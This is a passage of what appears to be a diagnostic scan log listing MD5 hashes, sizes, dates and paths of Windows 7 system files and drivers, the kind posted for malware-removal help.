C:\Windows\winsxs\x86_microsoft-windows-autochk_31bf3856ad364e35_6.1.7601.17514_none_e3fb573520033bfa\autochk.exe [color=#A23BEC]< MD5 for: BEEP.SYS >[/color] [2009/07/14 01:00:13 | 000,006,656 | ---- | M] (Microsoft Corporation) MD5=16A47CE2DECC9B099349A5F840654746 -- C:\Windows\SysNative\drivers\beep.sys [2009/07/14 01:00:13 | 000,006,656 | ---- | M] (Microsoft Corporation) MD5=16A47CE2DECC9B099349A5F840654746 -- C:\Windows\winsxs\amd64_microsoft-windows-beepsys_31bf3856ad364e35_6.1.7600.16385_none_201592fa214e4f02\beep.sys [color=#A23BEC]< MD5 for: CNGAUDIT.DLL >[/color] [2009/07/14 02:15:06 | 000,012,288 | ---- | M] (Microsoft Corporation) MD5=50BA656134F78AF64E4DD3C8B6FEFD7E -- C:\Windows\SysWOW64\cngaudit.dll [2009/07/14 02:15:06 | 000,012,288 | ---- | M] (Microsoft Corporation) MD5=50BA656134F78AF64E4DD3C8B6FEFD7E -- C:\Windows\winsxs\x86_microsoft-windows-cngaudit-dll_31bf3856ad364e35_6.1.7600.16385_none_e83a414890e8132b\cngaudit.dll [2009/07/14 02:40:20 | 000,018,944 | ---- | M] (Microsoft Corporation) MD5=86FE1B1F8FD42CD0DB641AB1CDB13093 -- C:\Windows\SysNative\cngaudit.dll [2009/07/14 02:40:20 | 000,018,944 | ---- | M] (Microsoft Corporation) MD5=86FE1B1F8FD42CD0DB641AB1CDB13093 -- C:\Windows\winsxs\amd64_microsoft-windows-cngaudit-dll_31bf3856ad364e35_6.1.7600.16385_none_4458dccc49458461\cngaudit.dll [color=#A23BEC]< MD5 for: EVENTLOG.DLL >[/color] [2010/01/27 00:29:28 | 000,028,797 | ---- | M] () MD5=4571E750E4A920D773511F50A2E62A20 -- C:\Program Files\MATLAB\R2014b\sys\perl\win32\lib\auto\Win32\EventLog\EventLog.dll [color=#A23BEC]< MD5 for: EXPLORER.EXE >[/color] [2013/11/21 19:45:12 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=0FB9C74046656D1579A64660AD67B746 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_ba87e574ddfe652d\explorer.exe [2012/09/06 11:03:07 | 002,872,320 | ---- | M] (Microsoft Corporation) MD5=1FFBA7A43EB296626BB5C6AF8F070006 -- C:\Windows\KJ\UI\x64\explorer\explorer.exe [2013/11/21 19:45:12 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\explorer.exe [2013/11/21 19:45:12 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=332FEAB1435662FC6C672E25BEB37BE3 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_afa79dc39081d0ba\explorer.exe [2013/11/21 19:45:12 | 002,871,808 | ---- | M] (Microsoft Corporation) MD5=3B69712041F3D63605529BD66DC00C48 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.21669_none_b0333b22a99da332\explorer.exe [2010/11/21 04:24:25 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=40D777B7A95E00593EB1568C68514493 -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_ba2f56d3c4bcbafb\explorer.exe [2013/11/21 19:45:12 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\SysWOW64\explorer.exe [2013/11/21 19:45:12 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=8B88EBBB05A0E56B7DCC708498C02B3E -- C:\Windows\winsxs\wow64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17567_none_b9fc4815c4e292b5\explorer.exe [2010/11/21 04:24:11 | 002,872,320 | ---- | M] (Microsoft Corporation) MD5=AC4C51EB24AA95B77F705AB159189E24 -- C:\Windows\winsxs\amd64_microsoft-windows-explorer_31bf3856ad364e35_6.1.7601.17514_none_afdaac81905bf900\explorer.exe [2012/10/02 23:00:38 | 002,616,320 | ---- | M] (Microsoft Corporation) MD5=C035EE097EBF704EB1CA40BEDFFCF1A3 -- C:\Windows\KJ\UI\x86\explorer\explorer.exe [color=#A23BEC]< MD5 for: HIDSERV.DLL >[/color] [2009/07/14 02:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) MD5=2BC6F6A1992B3A77F5F41432CA6B3B6B -- C:\Windows\SysWOW64\hidserv.dll [2009/07/14 02:15:24 | 000,049,152 | ---- | M] (Microsoft Corporation) MD5=2BC6F6A1992B3A77F5F41432CA6B3B6B -- C:\Windows\winsxs\wow64_microsoft-windows-hid-user_31bf3856ad364e35_6.1.7600.16385_none_3cf5e466d58070d9\hidserv.dll [2009/07/14 02:41:00 | 000,038,912 | ---- | M] (Microsoft Corporation) MD5=BD9EB3958F213F96B97B1D897DEE006D -- C:\Windows\SysNative\hidserv.dll [2009/07/14 02:41:00 | 000,038,912 | ---- | M] (Microsoft Corporation) MD5=BD9EB3958F213F96B97B1D897DEE006D -- C:\Windows\winsxs\amd64_microsoft-windows-hid-user_31bf3856ad364e35_6.1.7600.16385_none_32a13a14a11faede\hidserv.dll [color=#A23BEC]< MD5 for: IASTORV.SYS >[/color] [2010/11/21 04:23:47 | 000,410,496 | ---- | M] (Intel Corporation) MD5=3DF4395A7CF8B7A72A5F4606366B8C2D -- C:\Windows\SysNative\DriverStore\FileRepository\iastorv.inf_amd64_neutral_668286aa35d55928\iaStorV.sys [2010/11/21 04:23:47 | 000,410,496 | ---- | M] (Intel Corporation) MD5=3DF4395A7CF8B7A72A5F4606366B8C2D -- C:\Windows\winsxs\amd64_iastorv.inf_31bf3856ad364e35_6.1.7601.17514_none_0d3757e79e6784d0\iaStorV.sys [2013/11/21 21:00:36 | 000,410,496 | ---- | M] (Intel Corporation) MD5=5B3DE7208E5000D5B451B9D290D2579C -- C:\Windows\winsxs\amd64_iastorv.inf_31bf3856ad364e35_6.1.7601.21680_none_0d714416b7c182d5\iaStorV.sys [2013/11/21 21:00:36 | 000,410,496 | ---- | M] (Intel Corporation) MD5=AAAF44DB3BD0B9D1FB6969B23ECC8366 -- C:\Windows\SysNative\drivers\iaStorV.sys [2013/11/21 21:00:36 | 000,410,496 | ---- | M] (Intel Corporation) MD5=AAAF44DB3BD0B9D1FB6969B23ECC8366 -- C:\Windows\SysNative\DriverStore\FileRepository\iastorv.inf_amd64_neutral_0bcee2057afcc090\iaStorV.sys [2013/11/21 21:00:36 | 000,410,496 | ---- | M] (Intel Corporation) MD5=AAAF44DB3BD0B9D1FB6969B23ECC8366 -- C:\Windows\winsxs\amd64_iastorv.inf_31bf3856ad364e35_6.1.7601.17577_none_0cf9793d9e95787b\iaStorV.sys [color=#A23BEC]< MD5 for: IMM32.DLL >[/color] [2010/11/21 04:24:25 | 000,119,808 | ---- | M] (Microsoft Corporation) MD5=A6F09E5669D9A19035F6D942CAA15882 -- C:\Windows\SysWOW64\imm32.dll [2010/11/21 04:24:25 | 000,119,808 | ---- | M] (Microsoft Corporation) MD5=A6F09E5669D9A19035F6D942CAA15882 -- C:\Windows\winsxs\wow64_microsoft-windows-imm32_31bf3856ad364e35_6.1.7601.17514_none_c4d0cdd7c56b493e\imm32.dll [2009/07/14 02:41:09 | 000,167,424 | ---- | M] (Microsoft Corporation) MD5=AA2C08CE85653B1A0D2E4AB407FA176C -- C:\Windows\SysNative\imm32.dll [2009/07/14 02:41:09 | 000,167,424 | ---- | M] (Microsoft Corporation) MD5=AA2C08CE85653B1A0D2E4AB407FA176C -- C:\Windows\winsxs\amd64_microsoft-windows-imm32_31bf3856ad364e35_6.1.7600.16385_none_b84b0fbd941c03a9\imm32.dll [color=#A23BEC]< MD5 for: KERNEL32.DLL >[/color] [2012/10/04 18:41:16 | 001,161,216 | ---- | M] (Microsoft Corporation) MD5=1DC3504CA4C57900F1557E9A3F01D272 -- C:\Windows\winsxs\amd64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.17965_none_f1aee2f66d12ac97\kernel32.dll [2013/11/21 20:52:51 | 001,114,112 | ---- | M] (Microsoft Corporation) MD5=365A5034093AD9E04F433046C4CDF6AB -- C:\Windows\winsxs\wow64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.18229_none_fc32aa0ea14f91ba\kernel32.dll [2014/03/04 12:08:24 | 001,164,800 | ---- | M] (Microsoft Corporation) MD5=52E77DC8E31C89FBB1E968699C8121C5 -- C:\Windows\winsxs\amd64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.22616_none_f26f71478606ff08\kernel32.dll [2012/10/04 17:36:32 | 001,114,112 | ---- | M] (Microsoft Corporation) MD5=5FA395364EE727E4BEE6B1406C207F98 -- C:\Windows\winsxs\wow64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.22125_none_fcb841e5ba70d1da\kernel32.dll [2013/11/21 20:52:50 | 001,114,112 | ---- | M] (Microsoft Corporation) MD5=61579F821AB5FF7FA2966D64D1070BA8 -- C:\Windows\winsxs\wow64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.22411_none_fcbf165bba6c4802\kernel32.dll [2013/11/08 13:10:45 | 001,161,216 | ---- | M] (Microsoft Corporation) MD5=65C113214F7B05820F6D8A65B1485196 -- C:\Windows\winsxs\amd64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.18015_none_f1e4cab46cea5424\kernel32.dll [2014/03/04 10:16:17 | 001,114,112 | ---- | M] (Microsoft Corporation) MD5=76161B9D78A275F8F28DD67436013110 -- C:\Windows\SysWOW64\kernel32.dll [2014/03/04 10:16:17 | 001,114,112 | ---- | M] (Microsoft Corporation) MD5=76161B9D78A275F8F28DD67436013110 -- C:\Windows\winsxs\wow64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.18409_none_fc484db2a13f5426\kernel32.dll [2014/04/12 03:32:01 | 001,164,800 | ---- | M] (Microsoft Corporation) MD5=77BBBF70BCE286CD19E1E68F248363FA -- C:\Windows\winsxs\amd64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.22653_none_f24130b9862a22c7\kernel32.dll [2013/11/21 20:55:34 | 001,162,240 | ---- | M] (Microsoft Corporation) MD5=786D234A90FCAC72633AE6FC52653A49 -- C:\Windows\winsxs\amd64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.22436_none_f259cda386173c9c\kernel32.dll [2010/11/21 04:24:07 | 001,161,216 | ---- | M] (Microsoft Corporation) MD5=7A6326D96D53048FDEC542DF23D875A0 -- C:\Windows\winsxs\amd64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.17514_none_f1e3eab06ceb12ef\kernel32.dll [2014/03/04 11:38:24 | 001,114,112 | ---- | M] (Microsoft Corporation) MD5=866696FBE24914047462E34812169954 -- C:\Windows\winsxs\wow64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.22616_none_fcc41b99ba67c103\kernel32.dll [2013/11/08 13:10:44 | 001,114,112 | ---- | M] (Microsoft Corporation) MD5=9CC2571E3646B9A24296AD7ADCC71682 -- C:\Windows\winsxs\wow64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.22177_none_fc8432ddba97903d\kernel32.dll [2013/11/08 13:10:44 | 001,114,112 | ---- | M] (Microsoft Corporation) MD5=AC0B6F41882FC6ED186962D770EBF1D2 -- C:\Windows\winsxs\wow64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.18015_none_fc397506a14b161f\kernel32.dll [2013/11/08 13:10:45 | 001,163,264 | ---- | M] (Microsoft Corporation) MD5=B3BEA6420D482356E53B7C728E05C637 -- C:\Windows\winsxs\amd64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.22177_none_f22f888b8636ce42\kernel32.dll [2013/11/21 20:52:51 | 001,162,240 | ---- | M] (Microsoft Corporation) MD5=C525D51A79B01342344F02E38866CF60 -- C:\Windows\winsxs\amd64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.22411_none_f26a6c09860b8607\kernel32.dll [2014/04/12 03:05:53 | 001,114,112 | ---- | M] (Microsoft Corporation) MD5=C8C41EBEE097FEB29FB816854D3AD1E7 -- C:\Windows\winsxs\wow64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.22653_none_fc95db0bba8ae4c2\kernel32.dll [2014/03/04 10:44:00 | 001,163,264 | ---- | M] (Microsoft Corporation) MD5=D2A513EE880D71BDE7F0257F38B9D019 -- C:\Windows\SysNative\kernel32.dll [2014/03/04 10:44:00 | 001,163,264 | ---- | M] (Microsoft Corporation) MD5=D2A513EE880D71BDE7F0257F38B9D019 -- C:\Windows\winsxs\amd64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.18409_none_f1f3a3606cde922b\kernel32.dll [2012/10/04 17:47:40 | 001,114,112 | ---- | M] (Microsoft Corporation) MD5=D4F3176082566CEFA633B4945802D4C4 -- C:\Windows\winsxs\wow64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.17965_none_fc038d48a1736e92\kernel32.dll [2013/11/21 20:52:51 | 001,161,216 | ---- | M] (Microsoft Corporation) MD5=D8973E71F1B35CD3F3DEA7C12D49D0F0 -- C:\Windows\winsxs\amd64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.18229_none_f1ddffbc6ceecfbf\kernel32.dll [2010/11/21 04:24:15 | 000,837,632 | ---- | M] (Microsoft Corporation) MD5=E80758CF485DB142FCA1EE03A34EAD05 -- C:\Windows\winsxs\wow64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.17514_none_fc389502a14bd4ea\kernel32.dll [2013/11/21 20:55:34 | 001,114,112 | ---- | M] (Microsoft Corporation) MD5=EE751CBD5D0C332FDF3DF7187B612416 -- C:\Windows\winsxs\wow64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.22436_none_fcae77f5ba77fe97\kernel32.dll [2012/10/04 18:37:46 | 001,162,240 | ---- | M] (Microsoft Corporation) MD5=F3C594D0DA3ACFA6C7B781A490AB4282 -- C:\Windows\winsxs\amd64_microsoft-windows-kernel32_31bf3856ad364e35_6.1.7601.22125_none_f263979386100fdf\kernel32.dll [color=#A23BEC]< MD5 for: MSWSOCK.DLL >[/color] [2010/11/21 04:24:00 | 000,326,144 | ---- | M] (Microsoft Corporation) MD5=1D5185A4C7E6695431AE4B55C3D7D333 -- C:\Windows\winsxs\amd64_microsoft-windows-w..-infrastructure-bsp_31bf3856ad364e35_6.1.7601.17514_none_16795c7543eb48cf\mswsock.dll [2013/11/21 20:57:45 | 000,231,424 | ---- | M] (Microsoft Corporation) MD5=6547D445C4B69DC0083B619AC642DF04 -- C:\Windows\winsxs\x86_microsoft-windows-w..-infrastructure-bsp_31bf3856ad364e35_6.1.7601.22444_none_bac3d364a4c3ea89\mswsock.dll [2010/11/21 04:24:09 | 000,232,448 | ---- | M] (Microsoft Corporation) MD5=8999B8631C7FD9F7F9EC3CAFD953BA24 -- C:\Windows\winsxs\x86_microsoft-windows-w..-infrastructure-bsp_31bf3856ad364e35_6.1.7601.17514_none_ba5ac0f18b8dd799\mswsock.dll [2013/11/21 20:57:45 | 000,327,168 | ---- | M] (Microsoft Corporation) MD5=9A9F9F1A77D6A80EE28B57664F00013E -- C:\Windows\SysNative\mswsock.dll [2013/11/21 20:57:45 | 000,327,168 | ---- | M] (Microsoft Corporation) MD5=9A9F9F1A77D6A80EE28B57664F00013E -- C:\Windows\winsxs\amd64_microsoft-windows-w..-infrastructure-bsp_31bf3856ad364e35_6.1.7601.18254_none_164e004b440bdabf\mswsock.dll [2013/11/21 20:57:45 | 000,327,168 | ---- | M] (Microsoft Corporation) MD5=BDDB1FD258B92DEE00F222D3304B5D9C -- C:\Windows\winsxs\amd64_microsoft-windows-w..-infrastructure-bsp_31bf3856ad364e35_6.1.7601.22444_none_16e26ee85d215bbf\mswsock.dll [2013/11/21 20:57:45 | 000,231,424 | ---- | M] (Microsoft Corporation) MD5=E94C583CDE2348950155F2AF2876F34D -- C:\Windows\SysWOW64\mswsock.dll [2013/11/21 20:57:45 | 000,231,424 | ---- | M] (Microsoft Corporation) MD5=E94C583CDE2348950155F2AF2876F34D -- C:\Windows\winsxs\x86_microsoft-windows-w..-infrastructure-bsp_31bf3856ad364e35_6.1.7601.18254_none_ba2f64c78bae6989\mswsock.dll [color=#A23BEC]< MD5 for: NDIS.SYS >[/color] [2013/11/21 20:09:38 | 000,950,128 | ---- | M] (Microsoft Corporation) MD5=5E74508FCB5820B29EEAFE24E6035BCF -- C:\Windows\winsxs\amd64_microsoft-windows-ndis_31bf3856ad364e35_6.1.7601.22097_none_06232d534c0a8d67\ndis.sys [2013/11/21 20:09:38 | 000,950,128 | ---- | M] (Microsoft Corporation) MD5=760E38053BF56E501D562B70AD796B88 -- C:\Windows\SysNative\drivers\ndis.sys [2013/11/21 20:09:38 | 000,950,128 | ---- | M] (Microsoft Corporation) MD5=760E38053BF56E501D562B70AD796B88 -- C:\Windows\winsxs\amd64_microsoft-windows-ndis_31bf3856ad364e35_6.1.7601.17939_none_05dc9a6832ba428a\ndis.sys [2010/11/21 04:23:55 | 000,951,680 | ---- | M] (Microsoft Corporation) MD5=79B47FD40D9A817E932F9D26FAC0A81C -- C:\Windows\winsxs\amd64_microsoft-windows-ndis_31bf3856ad364e35_6.1.7601.17514_none_05ed313632ae9759\ndis.sys [color=#A23BEC]< MD5 for: NETLOGON.DLL >[/color] [2010/11/21 04:24:01 | 000,695,808 | ---- | M] (Microsoft Corporation) MD5=AA339DD8BB128EF66660DFBBB59043D3 -- C:\Windows\SysNative\netlogon.dll [2010/11/21 04:24:01 | 000,695,808 | ---- | M] (Microsoft Corporation) MD5=AA339DD8BB128EF66660DFBBB59043D3 -- C:\Windows\winsxs\amd64_microsoft-windows-security-netlogon_31bf3856ad364e35_6.1.7601.17514_none_5bddbcb24e997298\netlogon.dll [2010/11/21 04:24:09 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=C1809B9907ADEDAF16F50C894100883B -- C:\Windows\SysWOW64\netlogon.dll [2010/11/21 04:24:09 | 000,563,712 | ---- | M] (Microsoft Corporation) MD5=C1809B9907ADEDAF16F50C894100883B -- C:\Windows\winsxs\wow64_microsoft-windows-security-netlogon_31bf3856ad364e35_6.1.7601.17514_none_6632670482fa3493\netlogon.dll [color=#A23BEC]< MD5 for: NTFS.SYS >[/color] [2010/11/21 04:23:55 | 001,659,776 | ---- | M] (Microsoft Corporation) MD5=05D78AA5CB5F3F5C31160BDB955D0B7C -- C:\Windows\winsxs\amd64_microsoft-windows-ntfs_31bf3856ad364e35_6.1.7601.17514_none_04972f2c338b23d4\ntfs.sys [2014/01/24 03:37:55 | 001,684,928 | ---- | M] (Microsoft Corporation) MD5=1A29A59A4C5BA6F8C85062A613B7E2B2 -- C:\Windows\SysNative\drivers\ntfs.sys [2014/01/24 03:37:55 | 001,684,928 | ---- | M] (Microsoft Corporation) MD5=1A29A59A4C5BA6F8C85062A613B7E2B2 -- C:\Windows\winsxs\amd64_microsoft-windows-ntfs_31bf3856ad364e35_6.1.7601.18378_none_045a363833b85029\ntfs.sys [2014/01/24 03:40:06 | 001,684,416 | ---- | M] (Microsoft Corporation) MD5=48B6047F82D5A8D0AEC71593F4ACD79B -- C:\Windows\winsxs\amd64_microsoft-windows-ntfs_31bf3856ad364e35_6.1.7601.22580_none_04d102ad4ce53e53\ntfs.sys [2013/11/21 21:00:36 | 001,659,776 | ---- | M] (Microsoft Corporation) MD5=87B104128D4D3BA3C13098BAEBF38082 -- C:\Windows\winsxs\amd64_microsoft-windows-ntfs_31bf3856ad364e35_6.1.7601.21680_none_04d11b5b4ce521d9\ntfs.sys [2013/11/21 21:00:36 | 001,659,776 | ---- | M] (Microsoft Corporation) MD5=A2F74975097F52A00745F9637451FDD8 -- C:\Windows\winsxs\amd64_microsoft-windows-ntfs_31bf3856ad364e35_6.1.7601.17577_none_0459508233b9177f\ntfs.sys [2013/11/21 20:34:12 | 001,686,888 | ---- | M] (Microsoft Corporation) MD5=A6AE4551BF8EED09FA3B6FCDF472F3E1 -- C:\Windows\winsxs\amd64_microsoft-windows-ntfs_31bf3856ad364e35_6.1.7601.22297_none_04cd2f154ce71430\ntfs.sys [2013/11/21 20:34:12 | 001,656,680 | ---- | M] (Microsoft Corporation) MD5=B98F8C6E31CD07B2E6F71F7F648E38C0 -- C:\Windows\winsxs\amd64_microsoft-windows-ntfs_31bf3856ad364e35_6.1.7601.18127_none_048f41be3390b0cf\ntfs.sys [color=#A23BEC]< MD5 for: NVSTOR.SYS >[/color] [2013/11/21 21:00:36 | 000,166,272 | ---- | M] (NVIDIA Corporation) MD5=D23C7E8566DA2B8A7C0DBBB761D54888 -- C:\Windows\winsxs\amd64_nvraid.inf_31bf3856ad364e35_6.1.7601.21680_none_983ab4c5eef82cad\nvstor.sys [2013/11/21 21:00:36 | 000,166,272 | ---- | M] (NVIDIA Corporation) MD5=DAB0E87525C10052BF65F06152F37E4A -- C:\Windows\SysNative\drivers\nvstor.sys [2013/11/21 21:00:36 | 000,166,272 | ---- | M] (NVIDIA Corporation) MD5=DAB0E87525C10052BF65F06152F37E4A -- C:\Windows\SysNative\DriverStore\FileRepository\nvraid.inf_amd64_neutral_0276fc3b3ea60d41\nvstor.sys [2013/11/21 21:00:36 | 000,166,272 | ---- | M] (NVIDIA Corporation) MD5=DAB0E87525C10052BF65F06152F37E4A -- C:\Windows\winsxs\amd64_nvraid.inf_31bf3856ad364e35_6.1.7601.17577_none_97c2e9ecd5cc2253\nvstor.sys [2010/11/21 04:23:47 | 000,166,272 | ---- | M] (NVIDIA Corporation) MD5=F7CD50FE7139F07E77DA8AC8033D1832 -- C:\Windows\SysNative\DriverStore\FileRepository\nvraid.inf_amd64_neutral_dd659ed032d28a14\nvstor.sys [2010/11/21 04:23:47 | 000,166,272 | ---- | M] (NVIDIA Corporation) MD5=F7CD50FE7139F07E77DA8AC8033D1832 -- C:\Windows\winsxs\amd64_nvraid.inf_31bf3856ad364e35_6.1.7601.17514_none_9800c896d59e2ea8\nvstor.sys [color=#A23BEC]< MD5 for: PROQUOTA.EXE >[/color] [2010/11/21 04:24:32 | 000,028,672 | ---- | M] (Microsoft Corporation) MD5=2E77BAB79F078654782F83F0A0AEFE31 -- C:\Windows\SysWOW64\proquota.exe [2010/11/21 04:24:32 | 000,028,672 | ---- | M] (Microsoft Corporation) MD5=2E77BAB79F078654782F83F0A0AEFE31 -- C:\Windows\winsxs\x86_microsoft-windows-proquota_31bf3856ad364e35_6.1.7601.17514_none_29ce61c2f0a740f4\proquota.exe [2010/11/21 04:24:16 | 000,031,744 | ---- | M] (Microsoft Corporation) MD5=C6C83C0DF40E11FA1F06625E95E41DE7 -- C:\Windows\SysNative\proquota.exe [2010/11/21 04:24:16 | 000,031,744 | ---- | M] (Microsoft Corporation) MD5=C6C83C0DF40E11FA1F06625E95E41DE7 -- C:\Windows\winsxs\amd64_microsoft-windows-proquota_31bf3856ad364e35_6.1.7601.17514_none_85ecfd46a904b22a\proquota.exe [color=#A23BEC]< MD5 for: QMGR.DLL >[/color] [2010/11/21 04:23:51 | 000,849,920 | ---- | M] (Microsoft Corporation) MD5=1EA7969E3271CBC59E1730697DC74682 -- C:\Windows\SysNative\qmgr.dll [2010/11/21 04:23:51 | 000,849,920 | ---- | M] (Microsoft Corporation) MD5=1EA7969E3271CBC59E1730697DC74682 -- C:\Windows\winsxs\amd64_microsoft-windows-bits-client_31bf3856ad364e35_6.1.7601.17514_none_81b6ca5c101195cd\qmgr.dll [color=#A23BEC]< MD5 for: SCECLI.DLL >[/color] [2010/11/21 04:23:54 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\SysWOW64\scecli.dll [2010/11/21 04:23:54 | 000,175,616 | ---- | M] (Microsoft Corporation) MD5=8124944EC89D6A1815E4E53F5B96AAF4 -- C:\Windows\winsxs\wow64_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7601.17514_none_a088921d241bbb4e\scecli.dll [2010/11/21 04:24:32 | 000,232,960 | ---- | M] (Microsoft Corporation) MD5=ED78427259134C63ED69804D2132B86C -- C:\Windows\SysNative\scecli.dll [2010/11/21 04:24:32 | 000,232,960 | ---- | M] (Microsoft Corporation) MD5=ED78427259134C63ED69804D2132B86C -- C:\Windows\winsxs\amd64_microsoft-windows-s..urationengineclient_31bf3856ad364e35_6.1.7601.17514_none_9633e7caefbaf953\scecli.dll [color=#A23BEC]< MD5 for: SPOOLSV.EXE >[/color] [2013/11/21 19:58:22 | 000,559,104 | ---- | M] (Microsoft Corporation) MD5=85DAA09A98C9286D4EA2BA8D0E644377 -- C:\Windows\SysNative\spoolsv.exe [2013/11/21 19:58:22 | 000,559,104 | ---- | M] (Microsoft Corporation) MD5=85DAA09A98C9286D4EA2BA8D0E644377 -- C:\Windows\winsxs\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_6.1.7601.17777_none_3433cdb2d8563d50\spoolsv.exe [2010/11/21 04:24:27 | 000,559,104 | ---- | M] (Microsoft Corporation) MD5=B96C17B5DC1424D56EEA3A99E97428CD -- C:\Windows\winsxs\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_6.1.7601.17514_none_3471a890d8284f57\spoolsv.exe [2013/11/21 19:58:22 | 000,559,616 | ---- | M] (Microsoft Corporation) MD5=B9D7A4858CF32A6A15D2763F1DE47E0E -- C:\Windows\winsxs\amd64_microsoft-windows-printing-spooler-core_31bf3856ad364e35_6.1.7601.21921_none_34ed7a43f150b682\spoolsv.exe [color=#A23BEC]< MD5 for: SVCHOST.EXE >[/color] [2009/07/14 02:14:41 | 000,020,992 | ---- | M] (Microsoft Corporation) MD5=54A47F6B5E09A77E61649109C6A08866 -- C:\Windows\SysWOW64\svchost.exe [2009/07/14 02:14:41 | 000,020,992 | ---- | M] (Microsoft Corporation) MD5=54A47F6B5E09A77E61649109C6A08866 -- C:\Windows\winsxs\x86_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7600.16385_none_b591afc466a15356\svchost.exe [2009/07/14 02:39:46 | 000,027,136 | ---- | M] (Microsoft Corporation) MD5=C78655BC80301D76ED4FEF1C1EA40A7D -- C:\Windows\SysNative\svchost.exe [2009/07/14 02:39:46 | 000,027,136 | ---- | M] (Microsoft Corporation) MD5=C78655BC80301D76ED4FEF1C1EA40A7D -- C:\Windows\winsxs\amd64_microsoft-windows-services-svchost_31bf3856ad364e35_6.1.7600.16385_none_11b04b481efec48c\svchost.exe [color=#A23BEC]< MD5 for: TERMSRV.DLL >[/color] [2014/10/14 03:13:06 | 000,683,520 | ---- | M] (Microsoft Corporation) MD5=008CD4EBFABCF78D0F19B3778492648C -- C:\Windows\SysNative\termsrv.dll [2014/10/14 03:13:06 | 000,683,520 | ---- | M] (Microsoft Corporation) MD5=008CD4EBFABCF78D0F19B3778492648C -- C:\Windows\winsxs\amd64_microsoft-windows-t..teconnectionmanager_31bf3856ad364e35_6.1.7601.18637_none_ecb2935b6af13c52\termsrv.dll [2010/11/21 04:24:07 | 000,680,960 | ---- | M] (Microsoft Corporation) MD5=2E648163254233755035B46DD7B89123 -- C:\Windows\winsxs\amd64_microsoft-windows-t..teconnectionmanager_31bf3856ad364e35_6.1.7601.17514_none_ecc547376ae3a1a3\termsrv.dll [2014/07/17 03:07:44 | 000,681,984 | ---- | M] (Microsoft Corporation) MD5=4FC4C50985E5B840F4D72E57286887B8 -- C:\Windows\winsxs\amd64_microsoft-windows-t..teconnectionmanager_31bf3856ad364e35_6.1.7601.18540_none_eca0bf836affa9bb\termsrv.dll [2014/10/14 03:16:40 | 000,686,592 | ---- | M] (Microsoft Corporation) MD5=6A5B600AD0041E9AF564DE73B716F3D2 -- C:\Windows\winsxs\amd64_microsoft-windows-t..teconnectionmanager_31bf3856ad364e35_6.1.7601.22843_none_ed2d60f8841a8fd8\termsrv.dll [2014/07/16 04:23:41 | 000,686,080 | ---- | M] (Microsoft Corporation) MD5=F4D7114060C034134A440846F411BB7F -- C:\Windows\winsxs\amd64_microsoft-windows-t..teconnectionmanager_31bf3856ad364e35_6.1.7601.22750_none_ed1f8e488425629d\termsrv.dll [color=#A23BEC]< MD5 for: USERINIT.EXE >[/color] [2010/11/21 04:23:55 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=61AC3EFDFACFDD3F0F11DD4FD4044223 -- C:\Windows\SysWOW64\userinit.exe [2010/11/21 04:23:55 | 000,026,624 | ---- | M] (Microsoft Corporation) MD5=61AC3EFDFACFDD3F0F11DD4FD4044223 -- C:\Windows\winsxs\x86_microsoft-windows-userinit_31bf3856ad364e35_6.1.7601.17514_none_de3024012ff21116\userinit.exe [2010/11/21 04:24:28 | 000,030,720 | ---- | M] (Microsoft Corporation) MD5=BAFE84E637BF7388C96EF48D4D3FDD53 -- C:\Windows\SysNative\userinit.exe [2010/11/21 04:24:28 | 000,030,720 | ---- | M] (Microsoft Corporation) MD5=BAFE84E637BF7388C96EF48D4D3FDD53 -- C:\Windows\winsxs\amd64_microsoft-windows-userinit_31bf3856ad364e35_6.1.7601.17514_none_3a4ebf84e84f824c\userinit.exe [color=#A23BEC]< MD5 for: VOLSNAP.SYS >[/color] [2010/11/21 04:23:47 | 000,295,808 | ---- | M] (Microsoft Corporation) MD5=0D08D2F3B3FF84E433346669B5E0F639 -- C:\Windows\SysNative\drivers\volsnap.sys [2010/11/21 04:23:47 | 000,295,808 | ---- | M] (Microsoft Corporation) MD5=0D08D2F3B3FF84E433346669B5E0F639 -- 